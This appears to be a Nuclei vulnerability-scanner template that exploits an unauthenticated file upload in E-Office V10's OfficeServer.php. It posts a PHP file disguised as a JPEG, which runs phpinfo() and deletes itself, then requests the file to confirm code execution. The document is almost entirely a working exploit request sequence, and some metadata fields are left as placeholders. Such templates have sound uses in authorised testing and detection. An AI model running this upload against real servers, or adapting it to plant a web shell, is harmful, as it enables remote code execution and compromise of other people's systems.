id: E-Office_V10_OfficeServer_upload
info:
  name: E-Office V10 OfficeServer
  author: weehhd
  severity: high
  description: https://www.fiversec.com/posts/e99786b9.html
  reference:
    - https://
  tags: tags
http:
  - raw:
      - |
        POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
        Content-Length: 397
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
        Accept-Encoding: gzip, deflate
        Connection: close


        ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
        Content-Disposition: form-data; name="FileData"; filename="1.jpg"
        Content-Type: image/jpeg

        <?php phpinfo();unlink(__FILE__);?>
        ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
        Content-Disposition: form-data; name="FormData"

        {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'}
        ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--
      - |+
        GET /eoffice10/server/public/iWebOffice2015/Document/test12.php HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache
        Cache-Control: no-cache
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-CN;q=0.8,en;q=0.7
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'PHP Version'
      - type: word
        part: header
        words:
          - HTTP/1.1 200 OK
